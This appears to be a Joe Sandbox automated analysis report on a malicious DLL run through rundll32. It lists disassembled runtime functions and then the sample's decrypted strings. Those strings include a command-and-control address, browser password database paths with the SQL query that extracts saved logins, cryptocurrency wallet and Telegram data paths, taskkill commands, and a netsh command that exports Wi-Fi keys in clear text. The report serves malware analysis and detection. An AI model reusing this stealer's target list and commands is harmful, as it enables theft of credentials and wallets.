Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: fd204283d8891cc8dd3dd5f6618d0f898c62712b526a02826c3a5b881438cd30
Instruction ID: fbc7b4a9f3776ef8633e6f2b65236d9d01ca6be3d6d103d727f390b36a52098d
Opcode Fuzzy Hash: fd204283d8891cc8dd3dd5f6618d0f898c62712b526a02826c3a5b881438cd30
Instruction Fuzzy Hash: 4F2184F16042976F9B10AFB5AD80D5BB76DEF477687104635F825DB280E731EC5087A0

Function 6FB98FF7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,6FB990B8,00000000,?,00000001,00000000,?,6FB9912F,00000001,FlsFree,6FBA6E3C,FlsFree,00000000), ref: 6FB99087

Strings

api-ms-, xrefs: 6FB99047

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 32312b6ac974a9b827706e6abb0bf2f5cf3c7612579a5912d1e8c4a488532e74
Instruction ID: 16f101bf87350a66ef7ff4b054d891c9ddd8816af1bdd298ea8300e8876447ee
Opcode Fuzzy Hash: 32312b6ac974a9b827706e6abb0bf2f5cf3c7612579a5912d1e8c4a488532e74
Instruction Fuzzy Hash: 3211A372A45660AFDB624B6DAC45B8D37A9EF037B0F110231E931EB2C8D760FD1186E1

Function 6FB9A2D9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6FB9A28B,?,?,6FB9A253,?,00000001,?), ref: 6FB9A2EE
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6FB9A301
FreeLibrary.KERNEL32(00000000,?,?,6FB9A28B,?,?,6FB9A253,?,00000001,?), ref: 6FB9A324

Strings

mscoree.dll, xrefs: 6FB9A2E7
CorExitProcess, xrefs: 6FB9A2F9

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 98e092a6a7c2637ef652b92bdf0b24403684cf1b4dd11ab1c697e2805ced2a76
Instruction ID: a046e6a4ab94f90d68aa08fc5c8119c72ac33cd3c2b0e56f0f67b976eb5bf318
Opcode Fuzzy Hash: 98e092a6a7c2637ef652b92bdf0b24403684cf1b4dd11ab1c697e2805ced2a76
Instruction Fuzzy Hash: ACF0A070909558FBDF119B66DC0EBDD7E7BEB03366F108064F801A2150CB328E21DB90

Function 6FB9E32E Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 6FB9E346

Part of subcall function 6FB9B90F: HeapFree.KERNEL32(00000000,00000000,?,6FB9AB0E), ref: 6FB9B925
Part of subcall function 6FB9B90F: GetLastError.KERNEL32(?,?,6FB9AB0E), ref: 6FB9B937

_free.LIBCMT ref: 6FB9E358
_free.LIBCMT ref: 6FB9E36A
_free.LIBCMT ref: 6FB9E37C
_free.LIBCMT ref: 6FB9E38E

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5562b6a5582b9522d4276496308efb9f399e1371f18efa8cb86aca239ce8f5aa
Instruction ID: 0b4d3766e88d674f92f2b8bff2effd2a8a5f883efe4cfdfec2d5ee91236ba4d4
Opcode Fuzzy Hash: 5562b6a5582b9522d4276496308efb9f399e1371f18efa8cb86aca239ce8f5aa
Instruction Fuzzy Hash: 16F030315187889BCE11DE6AF8C2D5F77E9FA037247646C2AF018D7580CB30FA918AB4

Function 6FB9BAFF Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6FB9BC99

Strings

*?, xrefs: 6FB9BB42

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 19c18ddf14ce9615cfa6117e23dcf04fce62630a8d918e35b75d869d6a8ef9cd
Instruction ID: 171e588cdf66521419a08a4657380859c95746a460fcb5df273b19b0efcf0d2b
Opcode Fuzzy Hash: 19c18ddf14ce9615cfa6117e23dcf04fce62630a8d918e35b75d869d6a8ef9cd
Instruction Fuzzy Hash: 42614AB5E002599FDB14CFA8D8805EDFBF5FF4A314B25816AD814EB344EB31AE418B90

Function 6FB98069 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 6FB98130
___AdjustPointer.LIBCMT ref: 6FB98153
___AdjustPointer.LIBCMT ref: 6FB981EF

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 5b7d3a9bf22847d0ad2ad2a661fcbff901645e30392858e00d86780f22be0c52
Instruction ID: 96cc940a13c2bbdd852c1e3ce5fa6a99b5dd6529e54fcb1b7942fd3116800663
Opcode Fuzzy Hash: 5b7d3a9bf22847d0ad2ad2a661fcbff901645e30392858e00d86780f22be0c52
Instruction Fuzzy Hash: 7451D076608796AFEB198F14F880BAE77A5EF0A314F60413ED91297290D731E881C790

Function 6FB9BA13 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6FB9C035: _free.LIBCMT ref: 6FB9C043

Part of subcall function 6FB9CC09: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,6FB9D927,6FB9FBE4,0000FDE9,00000000,?,?,?,6FB9F95D,0000FDE9,00000000,?), ref: 6FB9CCB5

GetLastError.KERNEL32 ref: 6FB9BA7B
__dosmaperr.LIBCMT ref: 6FB9BA82
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6FB9BAC1
__dosmaperr.LIBCMT ref: 6FB9BAC8

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 712e3d9aa41d8f6a29c99ca8f024496594ff6b8d65558bf4bd51160090fa831c
Instruction ID: 980633a3f3e216fb0ca1a7a781b83ad370691920b57c1de8b5713d4d495ea764
Opcode Fuzzy Hash: 712e3d9aa41d8f6a29c99ca8f024496594ff6b8d65558bf4bd51160090fa831c
Instruction Fuzzy Hash: E221B3B160438AAF9B109F65AC80D5FB7ADEF47368711C538F82897190EB30FE5187A0

Function 6FB9B2CC Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6FB9F6A4,?,00000001,6FB9D998,?,6FB9FB5E,00000001,?,?,?,6FB9D927,?,00000000), ref: 6FB9B2D1
_free.LIBCMT ref: 6FB9B32E
_free.LIBCMT ref: 6FB9B364
SetLastError.KERNEL32(00000000,00000006,000000FF,?,6FB9FB5E,00000001,?,?,?,6FB9D927,?,00000000,00000000,6FBACB38,0000002C,6FB9D998), ref: 6FB9B36F

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 93fdbc97768b82ec4262bbc7d15aaddcddc30d79f24c2da1231e69310b019f7e
Instruction ID: aed76908e89de28f06756d66e2b579f0e4715d7e06c9436c5dbedbadcfd83c51
Opcode Fuzzy Hash: 93fdbc97768b82ec4262bbc7d15aaddcddc30d79f24c2da1231e69310b019f7e
Instruction Fuzzy Hash: 341148726087C1ABDB20667BBC92F5F356AEBC7778B244238F134971C1DF619A224220

Function 6FBA0666 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6FBA00CA,?,00000001,?,00000001,?,6FB9F633,?,?,00000001), ref: 6FBA067D
GetLastError.KERNEL32(?,6FBA00CA,?,00000001,?,00000001,?,6FB9F633,?,?,00000001,?,00000001,?,6FB9FB7F,6FB9D927), ref: 6FBA0689

Part of subcall function 6FBA064F: CloseHandle.KERNEL32(FFFFFFFE,6FBA0699,?,6FBA00CA,?,00000001,?,00000001,?,6FB9F633,?,?,00000001,?,00000001), ref: 6FBA065F

___initconout.LIBCMT ref: 6FBA0699

Part of subcall function 6FBA0611: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6FBA0640,6FBA00B7,00000001,?,6FB9F633,?,?,00000001,?), ref: 6FBA0624

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6FBA00CA,?,00000001,?,00000001,?,6FB9F633,?,?,00000001,?), ref: 6FBA06AE

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 2ecf2960ab94bcb2f493150d259cbc04d379d5971aff36186bf529661f3639b3
Instruction ID: cc6adc7f6948a91d5b720e37c93265a23e536db5d2c799729519dbd697245584
Opcode Fuzzy Hash: 2ecf2960ab94bcb2f493150d259cbc04d379d5971aff36186bf529661f3639b3
Instruction Fuzzy Hash: 1CF01C76004668BBCF226FDADC0598E3F66FF4A3B4F045010FA1987160C6328871EBA1

Function 6FB9AC4F Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6FB9AC58

Part of subcall function 6FB9B90F: HeapFree.KERNEL32(00000000,00000000,?,6FB9AB0E), ref: 6FB9B925
Part of subcall function 6FB9B90F: GetLastError.KERNEL32(?,?,6FB9AB0E), ref: 6FB9B937

_free.LIBCMT ref: 6FB9AC6B
_free.LIBCMT ref: 6FB9AC7C
_free.LIBCMT ref: 6FB9AC8D

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 331cd99bae050e5d1a2b074c598eedc7ac9ec2c3c3b23f56f392d8fb01e30d38
Instruction ID: 40a4e831ac79613252e1308c4a77ec62ad99b7c5b653ff6e26795711f6bddf83
Opcode Fuzzy Hash: 331cd99bae050e5d1a2b074c598eedc7ac9ec2c3c3b23f56f392d8fb01e30d38
Instruction Fuzzy Hash: DEE0B671920E65AE8F426F17E8825CE3B31EB476347419026E8A857664D73207739FC9

Function 6FB9A367 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6FB9A3AA, 6FB9A3B1, 6FB9A3E7

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: d315d231748c6facc89031d7fbab211c0885625ba76f951f3abf95b15a3ef532
Instruction ID: 9c62c2a8217ad7145d0f46f51a7b5111eb863c3bbef1629868dd4dbaf02d7ca5
Opcode Fuzzy Hash: d315d231748c6facc89031d7fbab211c0885625ba76f951f3abf95b15a3ef532
Instruction Fuzzy Hash: B7416BB1E04695AFDB128F99ECC59DEBBBCEB87710F10407AE41497350E770AA51CB90

Function 6FB9866A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6FB9868F

Strings

RCC, xrefs: 6FB986A9
MOC, xrefs: 6FB986A1

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 731b48a1c1b0b837b70879c965166b30cf88b7eb7e979853c4641f148a95c84e
Instruction ID: 1023b07eaccfda3fa9c77acd85f8fc038bcfbce0ee8c021d92eb7666b6fde272
Opcode Fuzzy Hash: 731b48a1c1b0b837b70879c965166b30cf88b7eb7e979853c4641f148a95c84e
Instruction Fuzzy Hash: 8A416C72904249AFCF06CF94EC80AEEBBB5FF4A304F144169FA14AB251D335E951DB90

Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: 185.215.113.217
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: /CoreOPT/index.php
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: S-%lu-
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Mozilla\Firefox\Profiles\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \logins.json
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Exodus\exodus.wallet\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Exodus
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Electrum(
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Electrum
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: electrum_data\wallets
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FeatureUsage\AppSwitched
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Electrum.exe
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Electrum\wallets
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Armory\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Armory
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Taskkill /IM ArmoryQt.exe /F
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Dogecoin\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Dogecoin
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Litecoin\wallets
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Litecoin
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Taskkill /IM litecoin-qt.exe /F
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: DashCore\wallets\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Dashcore
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Taskkill /IM dash-qt.exe /F
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Telegram(
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \emoji
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \user_data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \dictionaries
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: key_datas
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: tdata\key_datas
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: tdata\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Telegram
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Telegram.exe
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Desktop.zip
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Files_\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: atomic\Local Storage\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Atomic
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Taskkill /IM "Atomic Wallet.exe" /F
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: configs
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Chrome
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Google\Chrome\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Google\Chrome\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Opera Software\Opera Stable\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Opera Software\Opera Stable\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Microsoft\Edge\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Microsoft\Edge\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Sputnik
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \SputnikLab\Sputnik\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \SputnikLab\Sputnik\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Chromium
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Chromium\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Chromium\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Orbitum
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Orbitum\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Orbitum\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Vivaldi
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Vivaldi\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Vivaldi\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Comodo
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Comodo\Dragon\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Comodo\Dragon\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: CocCoc
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \CocCoc\Browser\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \CocCoc\Browser\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Chedot
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Chedot\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Chedot\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: CentBrowser
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \CentBrowser\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \CentBrowser\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: netsh wlan export profile name=
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: folder=
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: key=clear
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: S-%lu-
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Exodus
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Electrum
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Armory\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Armory
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Dogecoin\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Dogecoin
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Litecoin
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Dashcore
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \emoji
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: key_datas
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: tdata\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Telegram
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: tdata\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Files_\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Atomic
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: configs
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Chrome
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Sputnik
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Chromium
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Orbitum
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Vivaldi
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Comodo
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: CocCoc
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Chedot
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: folder=

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

